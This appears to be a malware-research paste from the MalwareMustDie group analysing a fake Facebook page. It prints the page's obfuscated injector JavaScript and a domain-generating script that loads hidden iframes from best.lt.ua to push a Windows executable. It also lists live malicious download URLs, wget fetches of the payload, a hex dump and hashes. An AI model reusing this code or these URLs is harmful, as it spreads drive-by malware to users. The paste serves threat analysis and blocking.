- window.attachEvent('onload', qy9)
- };
- </script><script id='lllI'>var ppconf = 0;
- var qy7 = '';
- qy8 = String.fromCharCode(13, 10, 13, 10);
- for (i = 0; i < 470; i ++ )
- {
- qy7 += qy8
- };
- lI1I = "<" + "!--" + qy7 + "--" + ">";
- III1 = "/" + "*" + qy7 + "*" + "/";
- Illl = "<scr" + "ipt>" + lIII(1) + lIII(2) + "='" + lIII(3) + "'</scri" + "pt>";
- l1II = "<s" + "pan style='display:none'><pre>" + qy7 + "</pre></s" + "pan>";
- l1Il = l1II + lI1I + l1II;
- Il11 = "<" + "span>";
- I1l1 = "</" + "span>";
- Ill1 = "<" + "span style='visibility:hidden'>qweasdzxc" + I1l1;
- function l11I()
- {
- I111 = new Array('beforeBegin', 'afterBegin', 'beforeEnd', 'afterEnd');
- Il1I = new Array('html', 'head', 'body', 'a', 'img', 'div', 'form', 'table', 'script',
- 'input', 'p');
- lII1 = l1I1();
- switch(lII1)
- {
- case1 : IIII = new Array(79, 79, 79, 73, 73, 73, 73, 73, 73, 73, 73);
- break ;
- case2 : IIII = new Array(38, 47, 47, 15, 41, 15, 9, 9, 22, 15, 15);
- break ;
- case3 : IIII = new Array(0, 38, 38, 15, 9, 15, 9, 9, 22, 15, 15);
- break ;
- case4 : IIII = new Array(38, 47, 47, 15, 41, 15, 9, 9, 22, 15, 15);
- break ;
- default : IIII = new Array(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
- };
- lIIl = new Array(lI1I, III1, Illl, l1II, l1Il, Il11, I1l1, Ill1);
- I11l(document.getElementsByTagName(Il1I[2])[0], 2, lIIl[7]);
- for (t = 0; t < Il1I.length; t ++ )
- {
- m = IIII[t];
- I1lI = document.getElementsByTagName(Il1I[t]);
- ctaL = I1lI.length;
- for (j = 0; j < ctaL; j ++ )
- {
- for (x = 0; x < 4; x ++ )
- {
- if (m & Math.pow(2, x))
- {
- I11l(I1lI[j], x, lIIl[m >>> 4])
- }
- }
- }
- };
- IllI();
- I1ll();
- llll();
- lI1l();
- setTimeout('l11l()', 1000)
- };
- function IllI()
- {
- var I11I = document.images, IIIl = document.links, il = I11I.length, ll = IIIl.length,
- lll1;
- while (il)
- {
- Il1l = document.createElement('span');
- lll1 = I11I[ -- il];
- if (!(ppconf & 2))
- {
- try
- {
- Il1l.appendChild(lll1.parentNode.replaceChild(Il1l, lll1))
- }
- catch (e)
- {
- }
- }
- };
- while (ll)
- {
- Il1l = document.createElement('span');
- lll1 = IIIl[ -- ll];
- if (!(ppconf & 1))
- {
- try
- {
- Il1l.appendChild(lll1.parentNode.replaceChild(Il1l, lll1))
- }
- catch (e)
- {
- }
- }
- }
- };
- function I1ll()
- {
- window.open = null;
- document.open = null;
- window.alert = null;
- };
- function llll()
- {
- var extraFunc1Cntnt = 0
- };
- function lI1l()
- {
- var extraFunc2Cntnt = 0
- };
- function I11l(e, p, c)
- {
- try
- {
- if (!window.sidebar)
- {
- e.insertAdjacentHTML(I111[p], c)
- }
- else
- {
- rcf = document.createRange().createContextualFragment(c);
- if (p == 0)
- {
- e.parentNode.insertBefore(rcf, e)
- };
- if (p == 1)
- {
- e.insertBefore(rcf, e.firstChild)
- };
- if (p == 2)
- {
- e.appendChild(rcf)
- };
- if (p == 3)
- {
- e.parentNode.insertBefore(rcf, e.nextSibling)
- }
- }
- }
- catch (xuu)
- {
- }
- };
- function lIII(j)
- {
- r = Math.random();
- d = new Date().getTime();
- if (j == 1)
- {
- o = String.fromCharCode(Math.floor(r * 25 + 65))
- }
- else
- {
- o = Math.floor(r * d * 1000) + '';
- o += o;
- o += o;
- o += o
- };
- if (j == 3)
- {
- o += o;
- o += o
- };
- return o
- };
- if (typeof window.addEventListener != 'undefined')
- {
- window.addEventListener('load', l11I, false)
- }
- else if (typeof document.addEventListener != 'undefined')
- {
- document.addEventListener('load', l11I, false)
- }
- else if (typeof window.attachEvent != 'undefined')
- {
- window.attachEvent('onload', l11I)
- };
- function l1I1()
- {
- lII1 = 0;
- u = navigator.userAgent.toLowerCase();
- if (window.sidebar)
- {
- lII1 = 2
- };
- if (window.chrome)
- {
- lII1 = 3
- };
- if (window.opera)
- {
- lII1 = 4
- };
- if (document.all && lII1 !== 4)
- {
- lII1 = 1
- };
- if (u.indexOf('safari') > 1)
- {
- lII1 = 3
- };
- if ((lII1 == 1) && (u.indexOf('ie 10') > 1))
- {
- lII1 = 10
- };
- return lII1
- }
- </script> <script>function l11l()
- {
- try
- {
- l111 = document.getElementById('lllI');
- l111.parentNode.removeChild(l111)
- }
- catch (errr)
- {
- }
- }
- </script>
- //===================================
- //THE THREAT STARTS HERE!!!
- //The DGA Downloader Engine..
- //#MalwareMustDie!
- //====================================
- <TITLE>
- Facebook</TITLE><META NAME="Generator" CONTENT="Facebook.com"><META NAME="Author" CONTENT=
- "Facebook.com"><META NAME="Keywords" CONTENT="Wow, lol, awesome, cool"><META NAME="Description"
- CONTENT="Wow! Have you ever seen?"><link rel="shortcut icon" href=
- "http://fbstatic-a.akamaihd.net/rsrc.php/yP/r/Ivn-CVe5TGK.ico" /></HEAD><BODY> <script type=
- 'text/javascript'>function randomString(length)
- {
- var chars = 'abcdefghiklmnopqrstuvwxyz'.split('');
- if (!length)
- {
- length = Math.floor(Math.random() * chars.length)
- };
- var str = '';
- for (var i = 0; i < length; i ++ )
- {
- str += chars[Math.floor(Math.random() * chars.length)]
- };
- return str
- };
- function genDomain()
- {
- var sdom = 'http://' + randomString(6) + '.best.lt.ua/dlimage4.php?' + randomString(2) +
- '=' + randomString(4);
- document.write('<iframe src="' + sdom +
- '" width="0" height="0" frameborder="0"></iframe>');
- };
- genDomain()</script> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding=
- "0" align="center"><tbody><tr bgcolor="#3B5998" height="80"><td align="left" valign="center"><IMG
- SRC="http://fbstatic-a.akamaihd.net/rsrc.php/v2/yX/x/Qq6L1haQrYr.png" BORDER="0" ALT=""></td></tr>
- <tr bgcolor="#E7EBF2"><td align="center" valign="center"><font face=
- "lucida grande,tahoma,verdana,arial" color="#0E385F" size="+4"><B>
- Download and execute the facebook app, please! You will be surprised :)</B></font></td></tr><tr
- bgcolor="#E7EBF2"><td align="center" valign="top"><font face="lucida grande,tahoma,verdana,arial"
- color="#333333">Your download should be starting in 2 seconds...</font><BR><BR><A HREF=
- "javascript:document.location.href=document.location.href;"><font face=
- "lucida grande,tahoma,verdana,arial" color="#0E385F"><B>
- If your download doesn't start, please click here</B></font></A></td></tr></tbody></table> <script
- type='text/javascript'>window.setTimeout("document.location.href='http://wickedreport.com'", 120000)</script> </BODY></HTML>
- ===========================
- MALICIOUS URL FOR DOWNLOAD
- ===========================
- http://xizcvo.best.lt.ua/dlimage4.php?ol=bzhe
- http://kvnkyp.best.lt.ua/dlimage4.php?ol=bzhe
- http://lgktbu.best.lt.ua/dlimage4.php?zz=lwgb
- http://eclrwr.best.lt.ua/dlimage4.php?zz=lwgb
- http://xtkmcv.best.lt.ua/dlimage4.php?ol=bzhe
- http://knqmlf.best.lt.ua/dlimage4.php?ol=qmark
- and blah blah etc similar URL..
- ===========================
- MITIGATION
- ===========================
- Research Search Strings (Noted: NOT regex) and Mitigation= "best.lt.ua/dlimage4.php"
- ===========================
- PAYLOAD:
- ===========================
- ]$ wget http://paphgi.best.lt.ua/dlimage4.php
- --2013-11-08 06:08:22-- http://paphgi.best.lt.ua/dlimage4.php
- Resolving paphgi.best.lt.ua (paphgi.best.lt.ua)... 103.246.115.238
- Connecting to paphgi.best.lt.ua (paphgi.best.lt.ua)|103.246.115.238|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 160768 (157K) [application/force-download]
- Saving to: 'dlimage4.php'
- 100%[==============>] 160,768 405KB/s in 0.4s
- 2013-11-08 06:08:24 (405 KB/s) - 'dlimage4.php' saved [160768/160768]
- $ wget http://ahrcdv.best.lt.ua/dlimage4.php -O sample
- --2013-11-08 06:20:15-- http://ahrcdv.best.lt.ua/dlimage4.php
- Resolving ahrcdv.best.lt.ua (ahrcdv.best.lt.ua)... 103.246.115.238
- Connecting to ahrcdv.best.lt.ua (ahrcdv.best.lt.ua)|103.246.115.238|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 160768 (157K) [application/force-download]
- Saving to: 'sample2.exe'
- 100%[==============>] 160,768 349KB/s in 0.5s
- 2013-11-08 06:20:16 (349 KB/s) - 'sample2.exe' saved [160768/160768]
- // bintezxt
- 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
- 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
- 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- 0030 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 ................
- 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
- 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
- 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
- 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
- 0080 A0 5C EA C1 E4 3D 84 92 E4 3D 84 92 E4 3D 84 92 .....=...=...=..
- 0090 6A 22 97 92 F3 3D 84 92 C3 FB FF 92 E3 3D 84 92 j"...=.......=..
- 00A0 E4 3D 85 92 AD 3D 84 92 FA 6F 07 92 E5 3D 84 92 .=...=...o...=..
- 00B0 E4 3D 84 92 E6 3D 84 92 FA 6F 10 92 E5 3D 84 92 .=...=...o...=..
- 00C0 FA 6F 15 92 E5 3D 84 92 52 69 63 68 E4 3D 84 92 .o...=..Rich.=..
- 00D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- 00E0 50 45 00 00 4C 01 1C 00 CD A6 7B 52 00 00 00 00 PE..L.....{R....
- https://www.virustotal.com/en/file/c86c44ad564ad33d9c92e41530933747dc954875cbad403b809d2a86567b34ef/analysis/
- SHA256: c86c44ad564ad33d9c92e41530933747dc954875cbad403b809d2a86567b34ef
- SHA1: a98f5ae3e3f1dc174812706b7318708acae7af77
- MD5: d3fa25f8f7568735d36d565aa2b99c1a
- File size: 157.0 KB ( 160768 bytes )
- File name: a98f5ae3e3f1dc174812706b7318708acae7af77
- File type: Win32 EXE
- Tags: peexe
- Detection ratio: 5 / 47
- Analysis date: 2013-11-07 14:55:28 UTC ( 6 hours, 18 minutes ago )
- MORE PAyloads:
- http://urlquery.net/search.php?q=best.lt.ua%2Fdlimage4.php&type=string&start=2013-10-23&end=2013-11-07&max=50
- ----
- MalwareMustDie,NPO Research Group
- Web http://malwaremustdie.org
- Research blog: http://malwaremustdie.blogspot.com
- Wiki & Code: http://code.google.com/p/malwaremustdie/
- Report Pastes: http://pastebin.com/u/MalwareMustDie
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement